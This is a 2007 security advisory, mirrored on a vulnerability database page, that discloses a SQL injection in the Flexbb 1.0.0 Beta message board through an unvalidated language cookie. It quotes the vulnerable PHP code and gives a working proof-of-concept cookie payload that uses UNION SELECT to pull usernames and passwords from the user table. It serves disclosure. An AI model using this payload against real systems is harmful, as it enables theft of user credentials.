Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

advisory-481.txt

🗓️ 29 Mar 2007 00:00:00Reported by trueend5Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 43 Views

Flexbb 1.0.0 vulnerable to SQL injection, allowing remote exploitation via unvalidated input.

Code
`  
KAPDA New advisory  
Vendor: http://www.flexbb.net  
Vulnerable Version: 1.0.0 10005 Beta Release 1  
Bug: SQL Injection  
Exploitation: Remote with browser  
  
Description:  
--------------------  
Flexbb is a freely available PHP-based message board  
program that uses a MySQL database.  
  
Vulnerability:  
--------------------  
Sql Injection:  
The software does not properly validate user-supplied  
input that may allow a remote user to launch Sql  
injection attacks.  
There are multiple Input Validation errors, for  
example:  
// Code Snippet  
// Includes/Start.php  
// Lines #190-197  
if($_COOKIE['flexbb_lang_id'] == "")  
{  
$lang_id = $config['default_lang_id'];  
}  
else  
{  
$lang_id = $_COOKIE['flexbb_lang_id']; //--->Input  
Validation Error  
}  
  
POC:  
--------------------  
Condition: Magic quotes GPC = Off  
GET: http://example.com/flexbb/index.php?debug=1  
Cookie Name = flexbb_lang_id  
Cookie Value = none' UNION SELECT 'en',`username`,  
`password`,1,1 FROM `flexbb_users` WHERE `group` = '4  
  
original Advisory:  
--------------------  
http://www.kapda.ir/advisory-481.html  
  
Solution:  
--------------------  
No response from vendor, there is no solution at the  
time of this entry.  
  
Credit :  
--------------------  
Discovered & released by trueend5 (trueend5 kapda ir)  
Security Science Researchers Institute Of Iran  
[http://www.KAPDA.ir]  
  
  
  
  
____________________________________________________________________________________  
TV dinner still cooling?   
Check out "Tonight's Picks" on Yahoo! TV.  
http://tv.yahoo.com/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4
flexbb sql injectionremote exploitationinput validation errorsno vendor responsetrueend5 discovery
43